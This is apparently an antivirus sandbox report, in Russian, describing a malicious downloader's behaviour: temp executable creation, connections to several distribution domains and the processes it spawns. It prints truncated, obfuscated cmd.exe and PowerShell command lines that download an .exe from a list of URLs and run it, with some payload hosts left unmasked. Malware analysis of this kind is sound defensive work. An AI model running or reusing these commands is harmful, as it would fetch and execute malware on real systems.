Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:\C"set gB=;'HQN'=iRb$}}{hctac}};kaerb;'ast'=Pii$;wmo$ metI-ekovnI{ )00008 eg- htgnel.)wmo$ metI-teG(( fI;'BfJ'=qDW$;)wmo$ ,ZNH$(eliFdaolnwoD.Fak${yrt{...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\424.exe
Удаляет следующие файлы
- %TEMP%\424.exe
Сетевая активность
Подключается к
- 'im######etechnologies.com':80
- 'gu#####stcurbappeal.net':80
- 'bt###ation.com':80
- 'ca####igarei.com':80
TCP
Запросы HTTP GET
- http://im######etechnologies.com/IkFYsUsc
- http://gu#####stcurbappeal.net/NbFX739W
- http://bt###ation.com/kdp7xNXOu
- http://ca####igarei.com/wwYoQ1isV
UDP
- DNS ASK im######etechnologies.com
- DNS ASK jo####studio.com
- DNS ASK gu#####stcurbappeal.net
- DNS ASK bt###ation.com
- DNS ASK ca####igarei.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:\C"set gB=;'HQN'=iRb$}}{hctac}};kaerb;'ast'=Pii$;wmo$ metI-ekovnI{ )00008 eg- htgnel.)wmo$ metI-teG(( fI;'BfJ'=qDW$;)wmo$ ,ZNH$(eliFdaolnwoD.Fak${yrt{...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:/C"set gB=;'HQN'=iRb$}}{hctac}};kaerb;'ast'=Pii$;wmo$ metI-ekovnI{ )00008 eg- htgnel.)wmo$ metI-teG(( fI;'BfJ'=qDW$;)wmo$ ,ZNH$(eliFdaolnwoD.Fak${yrt{)ljB$ ni ZNH$(hcaerof;'exe.'+SNW$+'\'+pm...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo $KVE='Nbq';$kaF=new-object Net.WebClient;$Bjl='http://im######etechnologies.com/IkFYsUsc@http://jomjomstudio.com/aQfv0kOkac@http://gulfcoastcurbappeal.net/NbFX739W@http://btsstat...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
